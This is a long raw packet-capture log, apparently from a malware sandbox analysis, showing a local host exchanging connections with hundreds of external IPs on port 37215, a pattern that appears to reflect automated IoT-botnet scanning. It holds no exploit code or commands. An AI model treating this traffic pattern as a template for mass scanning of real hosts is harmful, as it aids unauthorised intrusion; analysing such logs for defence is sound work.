                                                        Jun 13, 2024 21:32:01.276355982 CEST3721533736156.104.179.121192.168.2.14
                                                        Jun 13, 2024 21:32:01.276556969 CEST372155025441.164.131.110192.168.2.14
                                                        Jun 13, 2024 21:32:01.276849031 CEST3721537012197.86.129.246192.168.2.14
                                                        Jun 13, 2024 21:32:01.276876926 CEST372154221241.197.219.42192.168.2.14
                                                        Jun 13, 2024 21:32:01.276904106 CEST3721552830156.29.211.164192.168.2.14
                                                        Jun 13, 2024 21:32:01.277286053 CEST3721533594156.129.125.8192.168.2.14
                                                        Jun 13, 2024 21:32:01.277314901 CEST3721549756156.38.225.89192.168.2.14
                                                        Jun 13, 2024 21:32:01.277343035 CEST3721540362197.212.39.176192.168.2.14
                                                        Jun 13, 2024 21:32:01.277482986 CEST372154769241.253.146.254192.168.2.14
                                                        Jun 13, 2024 21:32:01.277693033 CEST3721541802156.144.164.44192.168.2.14
                                                        Jun 13, 2024 21:32:01.277950048 CEST3721558792197.193.22.49192.168.2.14
                                                        Jun 13, 2024 21:32:01.278121948 CEST3721538622156.229.51.209192.168.2.14
                                                        Jun 13, 2024 21:32:01.278412104 CEST3721543954197.82.80.162192.168.2.14
                                                        Jun 13, 2024 21:32:01.278635025 CEST3721546294156.42.38.198192.168.2.14
                                                        Jun 13, 2024 21:32:01.278662920 CEST3721535198197.196.30.151192.168.2.14
                                                        Jun 13, 2024 21:32:01.279016972 CEST3721545386156.15.6.23192.168.2.14
                                                        Jun 13, 2024 21:32:01.279427052 CEST3721547896197.234.225.61192.168.2.14
                                                        Jun 13, 2024 21:32:01.279454947 CEST3721558562197.78.135.255192.168.2.14
                                                        Jun 13, 2024 21:32:01.279634953 CEST3721535380156.250.165.250192.168.2.14
                                                        Jun 13, 2024 21:32:01.279663086 CEST3721552582156.105.95.62192.168.2.14
                                                        Jun 13, 2024 21:32:01.279730082 CEST3721537566156.136.120.179192.168.2.14
                                                        Jun 13, 2024 21:32:01.279757977 CEST3721550056197.91.160.210192.168.2.14
                                                        Jun 13, 2024 21:32:01.280791998 CEST3721536516197.48.241.153192.168.2.14
                                                        Jun 13, 2024 21:32:01.280852079 CEST3651637215192.168.2.14197.48.241.153
                                                        Jun 13, 2024 21:32:01.280900002 CEST3721535144156.162.190.12192.168.2.14
                                                        Jun 13, 2024 21:32:01.280967951 CEST3721541406156.20.102.181192.168.2.14
                                                        Jun 13, 2024 21:32:01.281049013 CEST3514437215192.168.2.14156.162.190.12
                                                        Jun 13, 2024 21:32:01.281054020 CEST4140637215192.168.2.14156.20.102.181
                                                        Jun 13, 2024 21:32:01.281160116 CEST3721546710197.202.165.217192.168.2.14
                                                        Jun 13, 2024 21:32:01.281218052 CEST372155292841.26.79.229192.168.2.14
                                                        Jun 13, 2024 21:32:01.281271935 CEST5292837215192.168.2.1441.26.79.229
                                                        Jun 13, 2024 21:32:01.281291962 CEST4671037215192.168.2.14197.202.165.217
                                                        Jun 13, 2024 21:32:01.281476021 CEST3721554314156.126.111.142192.168.2.14
                                                        Jun 13, 2024 21:32:01.281518936 CEST5431437215192.168.2.14156.126.111.142
                                                        Jun 13, 2024 21:32:01.281733990 CEST372153354641.153.23.133192.168.2.14
                                                        Jun 13, 2024 21:32:01.281764030 CEST3721560660156.193.243.130192.168.2.14
                                                        Jun 13, 2024 21:32:01.281780005 CEST3354637215192.168.2.1441.153.23.133
                                                        Jun 13, 2024 21:32:01.281791925 CEST372155159041.183.243.254192.168.2.14
                                                        Jun 13, 2024 21:32:01.281807899 CEST6066037215192.168.2.14156.193.243.130
                                                        Jun 13, 2024 21:32:01.281838894 CEST5159037215192.168.2.1441.183.243.254
                                                        Jun 13, 2024 21:32:01.281886101 CEST3721551574156.57.126.92192.168.2.14
                                                        Jun 13, 2024 21:32:01.281930923 CEST5157437215192.168.2.14156.57.126.92
                                                        Jun 13, 2024 21:32:01.282310009 CEST372154032641.116.218.225192.168.2.14
                                                        Jun 13, 2024 21:32:01.282363892 CEST4032637215192.168.2.1441.116.218.225
                                                        Jun 13, 2024 21:32:01.282562971 CEST372154088441.216.57.211192.168.2.14
                                                        Jun 13, 2024 21:32:01.282593966 CEST372155742841.65.222.54192.168.2.14
                                                        Jun 13, 2024 21:32:01.282603979 CEST4088437215192.168.2.1441.216.57.211
                                                        Jun 13, 2024 21:32:01.282636881 CEST5742837215192.168.2.1441.65.222.54
                                                        Jun 13, 2024 21:32:01.282823086 CEST3721558042197.220.42.12192.168.2.14
                                                        Jun 13, 2024 21:32:01.282866955 CEST5804237215192.168.2.14197.220.42.12
                                                        Jun 13, 2024 21:32:01.282875061 CEST3721543634156.115.77.90192.168.2.14
                                                        Jun 13, 2024 21:32:01.282915115 CEST4363437215192.168.2.14156.115.77.90
                                                        Jun 13, 2024 21:32:01.283088923 CEST3721560904197.109.98.211192.168.2.14
                                                        Jun 13, 2024 21:32:01.283118010 CEST3721546396197.151.60.93192.168.2.14
                                                        Jun 13, 2024 21:32:01.283128977 CEST6090437215192.168.2.14197.109.98.211
                                                        Jun 13, 2024 21:32:01.283162117 CEST4639637215192.168.2.14197.151.60.93
                                                        Jun 13, 2024 21:32:01.283339977 CEST372154092041.253.1.253192.168.2.14
                                                        Jun 13, 2024 21:32:01.283380032 CEST4092037215192.168.2.1441.253.1.253
                                                        Jun 13, 2024 21:32:01.283683062 CEST3721542732197.11.254.119192.168.2.14
                                                        Jun 13, 2024 21:32:01.283730030 CEST4273237215192.168.2.14197.11.254.119
                                                        Jun 13, 2024 21:32:01.284208059 CEST3721550844197.221.212.245192.168.2.14
                                                        Jun 13, 2024 21:32:01.284238100 CEST3721554320156.51.73.140192.168.2.14
                                                        Jun 13, 2024 21:32:01.284256935 CEST5084437215192.168.2.14197.221.212.245
                                                        Jun 13, 2024 21:32:01.284282923 CEST5432037215192.168.2.14156.51.73.140
                                                        Jun 13, 2024 21:32:01.284326077 CEST3721536042197.106.84.205192.168.2.14
                                                        Jun 13, 2024 21:32:01.284373045 CEST3604237215192.168.2.14197.106.84.205
                                                        Jun 13, 2024 21:32:01.284570932 CEST3721541824197.20.19.32192.168.2.14
                                                        Jun 13, 2024 21:32:01.284615993 CEST4182437215192.168.2.14197.20.19.32
                                                        Jun 13, 2024 21:32:01.284882069 CEST372154451041.51.209.51192.168.2.14
                                                        Jun 13, 2024 21:32:01.284923077 CEST4451037215192.168.2.1441.51.209.51
                                                        Jun 13, 2024 21:32:01.285085917 CEST3721541638197.79.242.20192.168.2.14
                                                        Jun 13, 2024 21:32:01.285131931 CEST4163837215192.168.2.14197.79.242.20
                                                        Jun 13, 2024 21:32:01.285295963 CEST3721560524156.212.38.36192.168.2.14
                                                        Jun 13, 2024 21:32:01.285341024 CEST6052437215192.168.2.14156.212.38.36
                                                        Jun 13, 2024 21:32:01.285389900 CEST3721545134197.57.79.65192.168.2.14
                                                        Jun 13, 2024 21:32:01.285432100 CEST4513437215192.168.2.14197.57.79.65
                                                        Jun 13, 2024 21:32:01.285567999 CEST3721549332156.206.120.106192.168.2.14
                                                        Jun 13, 2024 21:32:01.285610914 CEST4933237215192.168.2.14156.206.120.106
                                                        Jun 13, 2024 21:32:01.285742998 CEST3721538426156.7.41.9192.168.2.14
                                                        Jun 13, 2024 21:32:01.285789967 CEST3842637215192.168.2.14156.7.41.9
                                                        Jun 13, 2024 21:32:01.285985947 CEST372153380641.122.183.100192.168.2.14
                                                        Jun 13, 2024 21:32:01.286025047 CEST3380637215192.168.2.1441.122.183.100
                                                        Jun 13, 2024 21:32:01.286133051 CEST3721550632197.173.171.143192.168.2.14
                                                        Jun 13, 2024 21:32:01.286173105 CEST5063237215192.168.2.14197.173.171.143
                                                        Jun 13, 2024 21:32:01.286391973 CEST3721537928156.86.152.11192.168.2.14
                                                        Jun 13, 2024 21:32:01.286468029 CEST3792837215192.168.2.14156.86.152.11
                                                        Jun 13, 2024 21:32:01.286524057 CEST372153303841.0.119.130192.168.2.14
                                                        Jun 13, 2024 21:32:01.286571980 CEST3303837215192.168.2.1441.0.119.130
                                                        Jun 13, 2024 21:32:01.286781073 CEST372153507841.159.91.0192.168.2.14
                                                        Jun 13, 2024 21:32:01.286828041 CEST3507837215192.168.2.1441.159.91.0
                                                        Jun 13, 2024 21:32:01.287125111 CEST372155878641.236.151.82192.168.2.14
                                                        Jun 13, 2024 21:32:01.287172079 CEST5878637215192.168.2.1441.236.151.82
                                                        Jun 13, 2024 21:32:01.287322998 CEST3721543012156.109.114.102192.168.2.14
                                                        Jun 13, 2024 21:32:01.287372112 CEST4301237215192.168.2.14156.109.114.102
                                                        Jun 13, 2024 21:32:01.287579060 CEST3721558904197.33.238.134192.168.2.14
                                                        Jun 13, 2024 21:32:01.287628889 CEST5890437215192.168.2.14197.33.238.134
                                                        Jun 13, 2024 21:32:01.287699938 CEST3721536982197.194.117.63192.168.2.14
                                                        Jun 13, 2024 21:32:01.287745953 CEST3698237215192.168.2.14197.194.117.63
                                                        Jun 13, 2024 21:32:01.287787914 CEST3721546738197.86.184.4192.168.2.14
                                                        Jun 13, 2024 21:32:01.287832975 CEST4673837215192.168.2.14197.86.184.4
                                                        Jun 13, 2024 21:32:01.288072109 CEST372155919641.190.81.189192.168.2.14
                                                        Jun 13, 2024 21:32:01.288114071 CEST5919637215192.168.2.1441.190.81.189
                                                        Jun 13, 2024 21:32:01.288228035 CEST3721554716197.136.231.200192.168.2.14
                                                        Jun 13, 2024 21:32:01.288273096 CEST5471637215192.168.2.14197.136.231.200
                                                        Jun 13, 2024 21:32:01.288434982 CEST3721539878156.248.189.91192.168.2.14
                                                        Jun 13, 2024 21:32:01.288479090 CEST3987837215192.168.2.14156.248.189.91
                                                        Jun 13, 2024 21:32:01.288573980 CEST372155951041.13.137.193192.168.2.14
                                                        Jun 13, 2024 21:32:01.288613081 CEST5951037215192.168.2.1441.13.137.193
                                                        Jun 13, 2024 21:32:01.288726091 CEST3721537550197.99.68.176192.168.2.14
                                                        Jun 13, 2024 21:32:01.288773060 CEST3755037215192.168.2.14197.99.68.176
                                                        Jun 13, 2024 21:32:01.288847923 CEST3721538250197.86.45.50192.168.2.14
                                                        Jun 13, 2024 21:32:01.288896084 CEST3825037215192.168.2.14197.86.45.50
                                                        Jun 13, 2024 21:32:01.289037943 CEST3721550622156.98.177.189192.168.2.14
                                                        Jun 13, 2024 21:32:01.289067030 CEST3721545504156.78.197.236192.168.2.14
                                                        Jun 13, 2024 21:32:01.289084911 CEST5062237215192.168.2.14156.98.177.189
                                                        Jun 13, 2024 21:32:01.289112091 CEST4550437215192.168.2.14156.78.197.236
                                                        Jun 13, 2024 21:32:01.289264917 CEST372154893041.170.24.175192.168.2.14
                                                        Jun 13, 2024 21:32:01.289309025 CEST4893037215192.168.2.1441.170.24.175
                                                        Jun 13, 2024 21:32:01.289421082 CEST372154433441.208.236.211192.168.2.14
                                                        Jun 13, 2024 21:32:01.289463043 CEST4433437215192.168.2.1441.208.236.211
                                                        Jun 13, 2024 21:32:01.289735079 CEST3721557536197.137.90.160192.168.2.14
                                                        Jun 13, 2024 21:32:01.289779902 CEST5753637215192.168.2.14197.137.90.160
                                                        Jun 13, 2024 21:32:01.289854050 CEST3721560122156.202.232.222192.168.2.14
                                                        Jun 13, 2024 21:32:01.289882898 CEST372154047441.170.153.182192.168.2.14
                                                        Jun 13, 2024 21:32:01.289896011 CEST6012237215192.168.2.14156.202.232.222
                                                        Jun 13, 2024 21:32:01.289925098 CEST4047437215192.168.2.1441.170.153.182
                                                        Jun 13, 2024 21:32:01.290065050 CEST3721555452156.53.90.107192.168.2.14
                                                        Jun 13, 2024 21:32:01.290112019 CEST5545237215192.168.2.14156.53.90.107
                                                        Jun 13, 2024 21:32:01.290895939 CEST372155908441.99.47.11192.168.2.14
                                                        Jun 13, 2024 21:32:01.290910006 CEST3721548398156.230.84.227192.168.2.14
                                                        Jun 13, 2024 21:32:01.290923119 CEST3721537976156.217.112.178192.168.2.14
                                                        Jun 13, 2024 21:32:01.290936947 CEST5908437215192.168.2.1441.99.47.11
                                                        Jun 13, 2024 21:32:01.290939093 CEST4839837215192.168.2.14156.230.84.227
                                                        Jun 13, 2024 21:32:01.290955067 CEST3797637215192.168.2.14156.217.112.178
                                                        Jun 13, 2024 21:32:01.290980101 CEST3721542860197.214.46.171192.168.2.14
                                                        Jun 13, 2024 21:32:01.291021109 CEST4286037215192.168.2.14197.214.46.171
                                                        Jun 13, 2024 21:32:01.291110992 CEST3721553538156.209.151.245192.168.2.14
                                                        Jun 13, 2024 21:32:01.291148901 CEST5353837215192.168.2.14156.209.151.245
                                                        Jun 13, 2024 21:32:01.291192055 CEST3721535564156.208.31.66192.168.2.14
                                                        Jun 13, 2024 21:32:01.291230917 CEST3556437215192.168.2.14156.208.31.66
                                                        Jun 13, 2024 21:32:01.291409016 CEST372154357441.161.127.92192.168.2.14
                                                        Jun 13, 2024 21:32:01.291446924 CEST4357437215192.168.2.1441.161.127.92
                                                        Jun 13, 2024 21:32:01.291533947 CEST372155270841.206.185.161192.168.2.14
                                                        Jun 13, 2024 21:32:01.291570902 CEST5270837215192.168.2.1441.206.185.161
                                                        Jun 13, 2024 21:32:01.291654110 CEST3721543326156.196.219.34192.168.2.14
                                                        Jun 13, 2024 21:32:01.291693926 CEST4332637215192.168.2.14156.196.219.34
                                                        Jun 13, 2024 21:32:01.292032003 CEST372155129441.69.45.122192.168.2.14
                                                        Jun 13, 2024 21:32:01.292073011 CEST5129437215192.168.2.1441.69.45.122
                                                        Jun 13, 2024 21:32:01.292313099 CEST372155478241.41.135.181192.168.2.14
                                                        Jun 13, 2024 21:32:01.292352915 CEST5478237215192.168.2.1441.41.135.181
                                                        Jun 13, 2024 21:32:01.292412996 CEST3721541972156.165.103.83192.168.2.14
                                                        Jun 13, 2024 21:32:01.292449951 CEST4197237215192.168.2.14156.165.103.83
                                                        Jun 13, 2024 21:32:01.292519093 CEST3721547426197.102.59.48192.168.2.14
                                                        Jun 13, 2024 21:32:01.292562962 CEST4742637215192.168.2.14197.102.59.48
                                                        Jun 13, 2024 21:32:01.292629004 CEST372154248241.36.193.183192.168.2.14
                                                        Jun 13, 2024 21:32:01.292671919 CEST4248237215192.168.2.1441.36.193.183
                                                        Jun 13, 2024 21:32:01.292848110 CEST3721548960156.151.238.12192.168.2.14
                                                        Jun 13, 2024 21:32:01.292886019 CEST4896037215192.168.2.14156.151.238.12
                                                        Jun 13, 2024 21:32:01.293019056 CEST3721551312197.107.126.192192.168.2.14
                                                        Jun 13, 2024 21:32:01.293057919 CEST5131237215192.168.2.14197.107.126.192
                                                        Jun 13, 2024 21:32:01.293173075 CEST372156098041.224.22.165192.168.2.14
                                                        Jun 13, 2024 21:32:01.293219090 CEST6098037215192.168.2.1441.224.22.165
                                                        Jun 13, 2024 21:32:01.293297052 CEST372155507241.75.138.125192.168.2.14
                                                        Jun 13, 2024 21:32:01.293339968 CEST5507237215192.168.2.1441.75.138.125
                                                        Jun 13, 2024 21:32:01.293395042 CEST3721556728156.255.131.213192.168.2.14
                                                        Jun 13, 2024 21:32:01.293432951 CEST5672837215192.168.2.14156.255.131.213
                                                        Jun 13, 2024 21:32:01.293586016 CEST372154512241.230.52.172192.168.2.14
                                                        Jun 13, 2024 21:32:01.293625116 CEST4512237215192.168.2.1441.230.52.172
                                                        Jun 13, 2024 21:32:01.293853045 CEST3721550440197.121.144.19192.168.2.14
                                                        Jun 13, 2024 21:32:01.293904066 CEST5044037215192.168.2.14197.121.144.19
                                                        Jun 13, 2024 21:32:01.294028997 CEST3721551480197.57.102.78192.168.2.14
                                                        Jun 13, 2024 21:32:01.294118881 CEST5148037215192.168.2.14197.57.102.78
                                                        Jun 13, 2024 21:32:01.294358969 CEST372155537441.136.79.242192.168.2.14
                                                        Jun 13, 2024 21:32:01.294373035 CEST3721543606156.250.205.241192.168.2.14
                                                        Jun 13, 2024 21:32:01.294385910 CEST372154637041.244.214.253192.168.2.14
                                                        Jun 13, 2024 21:32:01.294397116 CEST5537437215192.168.2.1441.136.79.242
                                                        Jun 13, 2024 21:32:01.294410944 CEST372155759841.240.242.23192.168.2.14
                                                        Jun 13, 2024 21:32:01.294414997 CEST4360637215192.168.2.14156.250.205.241
                                                        Jun 13, 2024 21:32:01.294424057 CEST3721537180197.28.31.212192.168.2.14
                                                        Jun 13, 2024 21:32:01.294437885 CEST3721538824197.175.146.61192.168.2.14
                                                        Jun 13, 2024 21:32:01.294450045 CEST372154090641.152.186.219192.168.2.14
                                                        Jun 13, 2024 21:32:01.294462919 CEST372155079841.206.170.161192.168.2.14
                                                        Jun 13, 2024 21:32:01.294476032 CEST372155677841.179.113.114192.168.2.14
                                                        Jun 13, 2024 21:32:01.294487953 CEST3721554984197.25.0.100192.168.2.14
                                                        Jun 13, 2024 21:32:01.294501066 CEST372156074441.112.83.38192.168.2.14
                                                        Jun 13, 2024 21:32:01.294512987 CEST3721550056197.14.145.195192.168.2.14
                                                        Jun 13, 2024 21:32:01.294538975 CEST3721542158197.29.202.116192.168.2.14
                                                        Jun 13, 2024 21:32:01.294550896 CEST372155785441.204.218.121192.168.2.14
                                                        Jun 13, 2024 21:32:01.294570923 CEST3721548808156.207.230.38192.168.2.14
                                                        Jun 13, 2024 21:32:01.294583082 CEST3721559734156.21.137.149192.168.2.14
                                                        Jun 13, 2024 21:32:01.294595003 CEST3721557794197.51.147.125192.168.2.14
                                                        Jun 13, 2024 21:32:01.294606924 CEST372156022041.69.85.249192.168.2.14
                                                        Jun 13, 2024 21:32:01.294619083 CEST3721545054197.68.134.58192.168.2.14
                                                        Jun 13, 2024 21:32:01.294631004 CEST3721545538156.189.17.67192.168.2.14
                                                        Jun 13, 2024 21:32:01.294642925 CEST3721551710197.22.13.185192.168.2.14
                                                        Jun 13, 2024 21:32:01.294656038 CEST3721546772197.8.66.15192.168.2.14
                                                        Jun 13, 2024 21:32:01.294681072 CEST3721541568156.92.147.164192.168.2.14
                                                        Jun 13, 2024 21:32:01.294693947 CEST3721534268197.46.116.68192.168.2.14
                                                        Jun 13, 2024 21:32:01.294706106 CEST3721546600197.250.137.31192.168.2.14
                                                        Jun 13, 2024 21:32:01.294718981 CEST3721547044156.190.3.255192.168.2.14
                                                        Jun 13, 2024 21:32:01.294732094 CEST3721535430197.191.248.144192.168.2.14
                                                        Jun 13, 2024 21:32:01.294744015 CEST3721544412156.215.111.69192.168.2.14
                                                        Jun 13, 2024 21:32:01.294755936 CEST3721549630156.222.64.102192.168.2.14
                                                        Jun 13, 2024 21:32:01.294768095 CEST3721535200197.64.1.53192.168.2.14
                                                        Jun 13, 2024 21:32:01.294780970 CEST3721542238156.188.13.29192.168.2.14
                                                        Jun 13, 2024 21:32:01.294792891 CEST3721537848156.151.243.30192.168.2.14
                                                        Jun 13, 2024 21:32:01.294806004 CEST3721535244156.112.6.10192.168.2.14
                                                        Jun 13, 2024 21:32:01.294819117 CEST372155711441.7.165.176192.168.2.14
                                                        Jun 13, 2024 21:32:01.294831038 CEST3721537908156.60.152.170192.168.2.14
                                                        Jun 13, 2024 21:32:01.294843912 CEST372153473641.133.157.144192.168.2.14
                                                        Jun 13, 2024 21:32:01.294857025 CEST3721542574156.15.191.127192.168.2.14
                                                        Jun 13, 2024 21:32:01.294868946 CEST3721546664156.181.3.63192.168.2.14
                                                        Jun 13, 2024 21:32:01.294881105 CEST3721538048197.84.189.45192.168.2.14
                                                        Jun 13, 2024 21:32:01.294893026 CEST3721535186197.23.17.96192.168.2.14
                                                        Jun 13, 2024 21:32:01.294903994 CEST372155309441.156.43.198192.168.2.14
                                                        Jun 13, 2024 21:32:01.294915915 CEST372153570441.41.164.139192.168.2.14
                                                        Jun 13, 2024 21:32:01.294929981 CEST372154721441.97.253.112192.168.2.14
                                                        Jun 13, 2024 21:32:01.294945955 CEST3721533980197.111.51.84192.168.2.14
                                                        Jun 13, 2024 21:32:01.294959068 CEST372155927441.247.55.21192.168.2.14
                                                        Jun 13, 2024 21:32:01.294970989 CEST3721538872156.11.233.227192.168.2.14
                                                        Jun 13, 2024 21:32:01.294984102 CEST3721553904197.44.84.112192.168.2.14
                                                        Jun 13, 2024 21:32:01.294996977 CEST3721559708156.8.7.247192.168.2.14
                                                        Jun 13, 2024 21:32:01.295008898 CEST372153389441.7.253.170192.168.2.14
                                                        Jun 13, 2024 21:32:01.295021057 CEST3721545102156.232.36.71192.168.2.14
                                                        Jun 13, 2024 21:32:01.295033932 CEST3721554852197.158.97.75192.168.2.14
                                                        Jun 13, 2024 21:32:01.295046091 CEST3721549474156.80.77.144192.168.2.14
                                                        Jun 13, 2024 21:32:01.295058012 CEST372153681241.208.29.174192.168.2.14
                                                        Jun 13, 2024 21:32:01.295080900 CEST4947437215192.168.2.14156.80.77.144
                                                        Jun 13, 2024 21:32:01.295097113 CEST3721554548156.66.66.19192.168.2.14
                                                        Jun 13, 2024 21:32:01.295100927 CEST3681237215192.168.2.1441.208.29.174
                                                        Jun 13, 2024 21:32:01.295142889 CEST5454837215192.168.2.14156.66.66.19
                                                        Jun 13, 2024 21:32:01.295499086 CEST372155214641.126.31.120192.168.2.14
                                                        Jun 13, 2024 21:32:01.295514107 CEST3721536084197.138.128.159192.168.2.14
                                                        Jun 13, 2024 21:32:01.295538902 CEST5214637215192.168.2.1441.126.31.120
                                                        Jun 13, 2024 21:32:01.295548916 CEST3608437215192.168.2.14197.138.128.159
                                                        Jun 13, 2024 21:32:01.295587063 CEST3721553776197.142.2.12192.168.2.14
                                                        Jun 13, 2024 21:32:01.295600891 CEST3721536800156.230.229.98192.168.2.14
                                                        Jun 13, 2024 21:32:01.295613050 CEST3721549090156.63.58.63192.168.2.14
                                                        Jun 13, 2024 21:32:01.295627117 CEST5377637215192.168.2.14197.142.2.12
                                                        Jun 13, 2024 21:32:01.295631886 CEST3680037215192.168.2.14156.230.229.98
                                                        Jun 13, 2024 21:32:01.295653105 CEST4909037215192.168.2.14156.63.58.63
                                                        Jun 13, 2024 21:32:01.295758963 CEST3721558542197.142.10.152192.168.2.14
                                                        Jun 13, 2024 21:32:01.295783043 CEST3721547302197.181.148.127192.168.2.14
                                                        Jun 13, 2024 21:32:01.295798063 CEST5854237215192.168.2.14197.142.10.152
                                                        Jun 13, 2024 21:32:01.295816898 CEST4730237215192.168.2.14197.181.148.127
                                                        Jun 13, 2024 21:32:01.295896053 CEST3721534316197.6.59.7192.168.2.14
                                                        Jun 13, 2024 21:32:01.295936108 CEST3431637215192.168.2.14197.6.59.7
                                                        Jun 13, 2024 21:32:01.296349049 CEST3721541362156.182.224.211192.168.2.14
                                                        Jun 13, 2024 21:32:01.296395063 CEST4136237215192.168.2.14156.182.224.211
                                                        Jun 13, 2024 21:32:01.296487093 CEST3721550152156.10.72.236192.168.2.14
                                                        Jun 13, 2024 21:32:01.296524048 CEST5015237215192.168.2.14156.10.72.236
                                                        Jun 13, 2024 21:32:01.296705961 CEST372154198641.8.81.143192.168.2.14
                                                        Jun 13, 2024 21:32:01.296749115 CEST4198637215192.168.2.1441.8.81.143
                                                        Jun 13, 2024 21:32:01.296897888 CEST372156002441.138.70.247192.168.2.14
                                                        Jun 13, 2024 21:32:01.296940088 CEST6002437215192.168.2.1441.138.70.247
                                                        Jun 13, 2024 21:32:01.296978951 CEST372155017641.128.10.150192.168.2.14
                                                        Jun 13, 2024 21:32:01.297018051 CEST5017637215192.168.2.1441.128.10.150
                                                        Jun 13, 2024 21:32:01.297271967 CEST372154617241.79.12.106192.168.2.14
                                                        Jun 13, 2024 21:32:01.297311068 CEST4617237215192.168.2.1441.79.12.106
                                                        Jun 13, 2024 21:32:01.297488928 CEST3721550738156.227.127.133192.168.2.14
                                                        Jun 13, 2024 21:32:01.297528982 CEST5073837215192.168.2.14156.227.127.133
                                                        Jun 13, 2024 21:32:01.297658920 CEST3721539806156.32.117.115192.168.2.14
                                                        Jun 13, 2024 21:32:01.297703981 CEST3980637215192.168.2.14156.32.117.115
                                                        Jun 13, 2024 21:32:01.297907114 CEST3721553468156.163.132.170192.168.2.14
                                                        Jun 13, 2024 21:32:01.297949076 CEST5346837215192.168.2.14156.163.132.170
                                                        Jun 13, 2024 21:32:01.298307896 CEST3721547022156.210.92.132192.168.2.14
                                                        Jun 13, 2024 21:32:01.298321962 CEST372155575841.192.118.90192.168.2.14
                                                        Jun 13, 2024 21:32:01.298336029 CEST3721534328197.218.104.23192.168.2.14
                                                        Jun 13, 2024 21:32:01.298348904 CEST3721534636156.208.54.232192.168.2.14
                                                        Jun 13, 2024 21:32:01.298373938 CEST372155694041.135.217.207192.168.2.14
                                                        Jun 13, 2024 21:32:01.298387051 CEST3721553190197.217.216.126192.168.2.14
                                                        Jun 13, 2024 21:32:01.298399925 CEST3721557092156.154.180.13192.168.2.14
                                                        Jun 13, 2024 21:32:01.298413038 CEST3721538766197.236.233.22192.168.2.14
                                                        Jun 13, 2024 21:32:01.298425913 CEST3721532918197.193.152.214192.168.2.14
                                                        Jun 13, 2024 21:32:01.298439026 CEST372154511841.116.95.160192.168.2.14
                                                        Jun 13, 2024 21:32:01.298450947 CEST3721532778156.149.71.33192.168.2.14
                                                        Jun 13, 2024 21:32:01.298463106 CEST372155788641.232.52.197192.168.2.14
                                                        Jun 13, 2024 21:32:01.298475027 CEST3721541740197.41.141.210192.168.2.14
                                                        Jun 13, 2024 21:32:01.298487902 CEST3721559730197.72.125.67192.168.2.14
                                                        Jun 13, 2024 21:32:01.298500061 CEST3721550156197.253.197.8192.168.2.14
                                                        Jun 13, 2024 21:32:01.298512936 CEST372155091641.19.63.155192.168.2.14
                                                        Jun 13, 2024 21:32:01.298525095 CEST372155011241.175.223.98192.168.2.14
                                                        Jun 13, 2024 21:32:01.298537016 CEST3721558962197.49.121.243192.168.2.14
                                                        Jun 13, 2024 21:32:01.298549891 CEST372156013441.135.22.141192.168.2.14
                                                        Jun 13, 2024 21:32:01.298563957 CEST372153487641.209.91.127192.168.2.14
                                                        Jun 13, 2024 21:32:01.298576117 CEST3721546964156.231.28.116192.168.2.14
                                                        Jun 13, 2024 21:32:01.298588991 CEST3721538980156.205.169.35192.168.2.14
                                                        Jun 13, 2024 21:32:01.298602104 CEST3721550698197.117.99.162192.168.2.14
                                                        Jun 13, 2024 21:32:01.298613071 CEST372155147641.210.222.247192.168.2.14
                                                        Jun 13, 2024 21:32:01.298628092 CEST3721558632156.173.125.201192.168.2.14
                                                        Jun 13, 2024 21:32:01.298640013 CEST372154232241.110.70.62192.168.2.14
                                                        Jun 13, 2024 21:32:01.298652887 CEST372155344041.208.120.64192.168.2.14
                                                        Jun 13, 2024 21:32:01.298665047 CEST372153545041.202.133.43192.168.2.14
                                                        Jun 13, 2024 21:32:01.298676968 CEST3721545962197.54.64.37192.168.2.14
                                                        Jun 13, 2024 21:32:01.298688889 CEST3721551868156.221.118.239192.168.2.14
                                                        Jun 13, 2024 21:32:01.298700094 CEST3721543354197.33.119.29192.168.2.14
                                                        Jun 13, 2024 21:32:01.298712969 CEST3721538158156.223.59.169192.168.2.14
                                                        Jun 13, 2024 21:32:01.298724890 CEST3721554108197.153.191.27192.168.2.14
                                                        Jun 13, 2024 21:32:01.298737049 CEST372155786441.54.235.110192.168.2.14
                                                        Jun 13, 2024 21:32:01.298935890 CEST372154328441.250.201.251192.168.2.14
                                                        Jun 13, 2024 21:32:01.298976898 CEST4328437215192.168.2.1441.250.201.251
                                                        Jun 13, 2024 21:32:01.299068928 CEST3721546454156.39.242.52192.168.2.14
                                                        Jun 13, 2024 21:32:01.299105883 CEST4645437215192.168.2.14156.39.242.52
                                                        Jun 13, 2024 21:32:01.299468994 CEST372155867241.13.134.169192.168.2.14
                                                        Jun 13, 2024 21:32:01.299508095 CEST5867237215192.168.2.1441.13.134.169
                                                        Jun 13, 2024 21:32:01.299577951 CEST3721555956197.24.35.193192.168.2.14
                                                        Jun 13, 2024 21:32:01.299622059 CEST5595637215192.168.2.14197.24.35.193
                                                        Jun 13, 2024 21:32:01.299891949 CEST3721546920156.49.142.156192.168.2.14
                                                        Jun 13, 2024 21:32:01.299932957 CEST4692037215192.168.2.14156.49.142.156
                                                        Jun 13, 2024 21:32:01.300389051 CEST3721545636156.15.57.226192.168.2.14
                                                        Jun 13, 2024 21:32:01.300437927 CEST4563637215192.168.2.14156.15.57.226
                                                        Jun 13, 2024 21:32:01.300591946 CEST372153874841.3.27.154192.168.2.14
                                                        Jun 13, 2024 21:32:01.300635099 CEST3874837215192.168.2.1441.3.27.154
                                                        Jun 13, 2024 21:32:01.300823927 CEST3721556112156.140.147.35192.168.2.14
                                                        Jun 13, 2024 21:32:01.300844908 CEST372155362041.161.11.142192.168.2.14
                                                        Jun 13, 2024 21:32:01.300865889 CEST5611237215192.168.2.14156.140.147.35
                                                        Jun 13, 2024 21:32:01.300885916 CEST5362037215192.168.2.1441.161.11.142
                                                        Jun 13, 2024 21:32:01.301076889 CEST372155051041.164.131.110192.168.2.14
                                                        Jun 13, 2024 21:32:01.301111937 CEST3721533992156.104.179.121192.168.2.14
                                                        Jun 13, 2024 21:32:01.301120043 CEST5051037215192.168.2.1441.164.131.110
                                                        Jun 13, 2024 21:32:01.301176071 CEST3399237215192.168.2.14156.104.179.121
                                                        Jun 13, 2024 21:32:01.301208019 CEST3721537268197.86.129.246192.168.2.14
                                                        Jun 13, 2024 21:32:01.301249981 CEST3726837215192.168.2.14197.86.129.246
                                                        Jun 13, 2024 21:32:01.301419020 CEST372154246841.197.219.42192.168.2.14
                                                        Jun 13, 2024 21:32:01.301461935 CEST4246837215192.168.2.1441.197.219.42
                                                        Jun 13, 2024 21:32:01.301603079 CEST3721533850156.129.125.8192.168.2.14
                                                        Jun 13, 2024 21:32:01.301646948 CEST3385037215192.168.2.14156.129.125.8
